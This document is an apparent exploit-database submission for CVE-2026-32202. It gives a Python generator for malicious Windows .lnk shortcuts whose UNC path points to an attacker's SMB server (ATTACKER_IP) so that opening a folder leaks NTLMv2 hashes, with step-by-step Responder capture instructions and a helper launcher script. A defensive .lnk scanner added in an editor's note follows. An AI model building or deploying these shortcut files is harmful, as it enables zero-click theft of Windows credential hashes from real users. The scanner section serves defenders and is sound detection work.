| Title | Published | Views | Family |
|---|---|---|---|
| A Shortcut to Coercion: Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202 | 23 Apr 2026 06:00 | – | akamaiblog |
| CVE-2026-32202 | 14 Apr 2026 16:57 | – | attackerkb |
| CVE-2026-32202 | 14 Apr 2026 16:57 | – | alpinelinux |
| Exploit for Protection Mechanism Failure in Microsoft | 30 Apr 2026 17:34 | – | githubexploit |
| CVE-2026-32202 | 14 Apr 2026 15:49 | – | circl |
| Microsoft Windows Protection Mechanism Failure Vulnerability | 28 Apr 2026 00:00 | – | cisa_kev |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 28 Apr 2026 12:00 | – | cisa |
| Microsoft Windows Shell Security Vulnerability | 14 Apr 2026 00:00 | – | cnnvd |
| Microsoft Windows Shell Spoofing Vulnerability | 21 Apr 2026 00:00 | – | cnvd |
| CVE-2026-32202 | 14 Apr 2026 16:57 | – | cve |
# Title: Microsoft - NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an
attacker to capture NTLMv2 hashes without user interaction. By crafting a
malicious .lnk (shortcut) file with a UNC path pointing to an
attacker-controlled SMB server, the target's Windows system automatically
sends an NTLMv2 authentication request when the folder containing the .lnk
file is opened. No click on the shortcut is required – simply viewing the
folder triggers the vulnerability.
**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)
**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025
**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
```text
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```
[+]Exploit:
```python
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""
import struct
import sys
import os


def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
                         share_name="share"):
    """
    Creates LNK file with UNC path to attacker machine
    """
    unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
    unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'
    # LNK structure (standard + vulnerable component)
    lnk = bytearray()
    # ===== HEADER (76 bytes) =====
    lnk.extend(struct.pack('<I', 0x0000004C))  # HeaderSize
    # LinkCLSID: {00021401-0000-0000-C000-000000000046}
    lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
    lnk.extend(struct.pack('<I', 0x000002A3))  # LinkFlags (HasName|HasWorkingDir|HasArguments|IsUnicode)
    lnk.extend(struct.pack('<I', 0x00000080))  # FileAttributes (NORMAL)
    lnk.extend(struct.pack('<Q', 0))  # CreationTime
    lnk.extend(struct.pack('<Q', 0))  # AccessTime
    lnk.extend(struct.pack('<Q', 0))  # WriteTime
    lnk.extend(struct.pack('<I', 0x00001000))  # FileSize
    lnk.extend(struct.pack('<I', 0x00000000))  # IconIndex
    lnk.extend(struct.pack('<I', 0x00000001))  # ShowCommand (SW_NORMAL)
    lnk.extend(struct.pack('<H', 0x0000))  # Hotkey
    lnk.extend(b'\x00\x00')  # Reserved
    lnk.extend(b'\x00\x00\x00\x00')  # Reserved2
    lnk.extend(b'\x00\x00\x00\x00')  # Reserved3
    # ===== IDLIST (activates when folder is opened) =====
    # Shell Folder IDITEM
    lnk.extend(b'\x14\x00')  # ItemID size (20 bytes)
    lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
    lnk.extend(b'\x00\x00')  # Terminating ID
    # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
    # NameString (UNC path - triggers NTLM hash leak)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)
    # ArgumentsString (empty)
    lnk.extend(b'\x00\x00')
    # WorkingDir (UNC path again)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)
    # ===== Console Properties (required for some Windows versions) =====
    lnk.extend(b'\x50\x00\x14\x00')  # dwWindowSize (80x20)
    lnk.extend(b'\x50\x00\xfa\x00')  # dwBufferSize (80x250)
    lnk.extend(b'\x00\x00\x00\x00')  # dwFontSize
    lnk.extend(b'\x00\x00\x00\x00')  # dwFontFamily
    lnk.extend(b'\x00\x00\x00\x00')  # dwFaceNameLen
    lnk.extend(b'\x00\x00\x00\x00')  # dwFaceNameOffset
    lnk.extend(b'\x00\x00\x00\x00')  # dwStyle
    # 64 bytes padding
    lnk.extend(b'\x00' * 64)
    # Save the file
    with open(output_file, 'wb') as f:
        f.write(lnk)
    return output_file, unc_path


def main():
    print(r"""
╔═══════════════════════════════════════════╗
║       CVE-2026-32202 - LNK Generator      ║
║           Author: nu11secur1ty            ║
╚═══════════════════════════════════════════╝
""")
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP> [output_file]")
        print("Example: python3 cve_2026_32202_gen.py 192.168.1.100 invoice.lnk")
        sys.exit(1)
    attacker_ip = sys.argv[1]
    output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"
    lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)
    print(f"[+] Exploit ready!")
    print(f"[+] File: {lnk_file}")
    print(f"[+] UNC path: {unc_path}")
    print()
    print("[*] Next steps:")
    print(f" 1. Start Responder: sudo responder -I eth0 -v")
    print(f" 2. Transfer {lnk_file} to Windows 11 Desktop")
    print(f" 3. Open Desktop in File Explorer (no click required)")
    print(f" 4. Watch Responder - NTLM hash will appear")
    print()
    with open("start_responder.sh", "w") as f:
        f.write("#!/bin/bash\n")
        f.write("echo \"[+] Starting Responder...\"\n")
        f.write("sudo responder -I eth0 -v\n")
    os.chmod("start_responder.sh", 0o755)
    print("[+] Helper script created: start_responder.sh")


if __name__ == "__main__":
    main()
```
Demo:
[href](https://www.patreon.com/posts/cve-2026-32202-159362448)
Code:
[code](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)
Time spent:
02:30:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/
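Editor's note. The submission above describes the trigger: a .lnk whose string fields carry a UNC path, so merely listing the folder makes Explorer authenticate to that host over SMB. The added example below is not from the submission or its author; it is a defender-side scanner that parses the ShellLink header and StringData section (NAME_STRING, RELATIVE_PATH, WORKING_DIR, COMMAND_LINE_ARGUMENTS, ICON_LOCATION, in MS-SHLLINK order) and flags any field that names a UNC share, which is what a mail gateway or file-share audit would check. It builds its own minimal sample .lnk files inline (constructed test input, not the payload above) and ignores the LinkInfo/IDList targets, which a full scanner would also inspect.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = [("NAME_STRING", 0x04), ("RELATIVE_PATH", 0x08),
                 ("WORKING_DIR", 0x10), ("COMMAND_LINE_ARGUMENTS", 0x20),
                 ("ICON_LOCATION", 0x40)]


def lnk_string_fields(data: bytes) -> dict:
    """Parse a ShellLink header and its StringData section; return {field: value}."""
    if len(data) < 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink (.lnk) file")
    header_size, flags = struct.unpack_from("<I16xI", data, 0)
    pos = header_size
    if flags & HAS_ID_LIST:                     # skip IDListSize (2) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no NUL
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        pos += count * width
    return fields


def remote_paths(data: bytes) -> dict:
    """StringData fields whose value is a UNC path (starts with two backslashes)."""
    return {k: v for k, v in lnk_string_fields(data).items() if v.startswith("\\\\")}


def build_sample_lnk(name: str, working_dir: str) -> bytes:
    """Constructed test input: minimal Unicode ShellLink with an empty IDList."""
    flags = HAS_ID_LIST | IS_UNICODE | 0x04 | 0x10      # HasName | HasWorkingDir
    header = struct.pack("<I16sIIQQQIIIH2s4s4s", 0x4C, LNK_CLSID, flags, 0x80,
                         0, 0, 0, 0, 0, 1, 0, b"\0\0", b"\0" * 4, b"\0" * 4)
    id_list = struct.pack("<HH", 2, 0)                   # IDListSize=2, TerminalID only
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (name, working_dir))
    return header + id_list + strings


if __name__ == "__main__":
    suspicious = build_sample_lnk("\\\\10.0.0.5\\share\\invoice.pdf", "C:\\Users\\Public")
    print(remote_paths(suspicious))   # {'NAME_STRING': '\\\\10.0.0.5\\share\\invoice.pdf'}
    print(remote_paths(build_sample_lnk("invoice.pdf", "C:\\Users\\Public")))   # {}
```

Run it over every .lnk in an inbound share or attachment quarantine; any non-empty result is a candidate for blocking, and the same parser lets you check that the April 2026 update has not left shortcuts with remote targets in user-writable folders.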
On Wed, May 27, 2026 at 2:06 PM Offsec Exploits <[email protected]> wrote:
> Hello,
>
> Thank you for your submission.
> We will be checking it shortly.
>
> Regards
> - Exploit-DB Team
>